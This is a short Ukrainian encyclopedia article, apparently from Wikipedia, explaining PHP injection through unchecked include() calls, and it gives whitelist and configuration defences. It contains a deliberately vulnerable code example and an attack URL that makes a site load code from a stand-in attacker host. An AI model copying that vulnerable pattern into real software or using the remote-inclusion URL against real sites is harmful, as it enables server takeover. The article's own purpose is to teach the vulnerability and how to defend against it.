# PHP-ін'єкція
PHP-ін'єкція (англ. PHP injection)  — один із способів злому вебсайтів, що працюють на PHP, який полягає у виконанні стороннього коду на серверній стороні. 
Потенційно небезпечними функціями є: 
- eval(),
- preg_replace() (з модифікатором «e»),
- require_once(),
- include_once(),
- include(),
- require(),
- create_function().

PHP-ін'єкція стає можливою, якщо вхідні параметри приймаються і використовуються без перевірки. 

## Приклад
```
<?
 

...

$module
 
=
 
$_GET
[
'module'
];

include
 
(
$module
.
'.php'
);

...

?>

```

Цей скрипт уразливий, оскільки до вмісту змінної $module просто додається «.php» та підключається файл. 
Зломщик може на своєму сайті створити файл, що містить PHP-код (http://hackersite.com/inc.php), і зайшовши на сайт за посиланням на зразок  
http://mysite.com/index.php?module=http://hackersite.com/inc
виконати будь-які PHP-команди. 

## Способи захисту
Існує декілька способів захисту від такої атаки: 
- Перевіряти, чи не містить змінна $module сторонні символи:

```
<?
 

...

$module
 
=
 
$_GET
[
'module'
];

if
 
(
strpbrk
(
$module
,
 
'. ?/:'
)
 
)
 
die
(
'Blocked'
);

include
 
$module
.
 
'.php'
;
 

...

?>

```

- Перевіряти, що $module присвоєно одне з допустимих значень:

```
<?
 

...

$module
 
=
 
$_GET
[
'module'
];

$arr
 
=
 
array
(
'main'
,
 
'about'
,
'links'
,
'forum'
);

if
 
(
!
in_array
(
$module
,
 
$arr
)
 
)
 
$module
 
=
 
$arr
[
0
];

include
 
$module
.
 
'.php'
 
;
 

...

?>

```

Цей спосіб є ефективнішим. 
PHP надає також можливість відключення використання віддалених файлів, це реалізується шляхом зміни значення опції allow_url_fopen  на Off у файлі конфігурації сервера php.ini.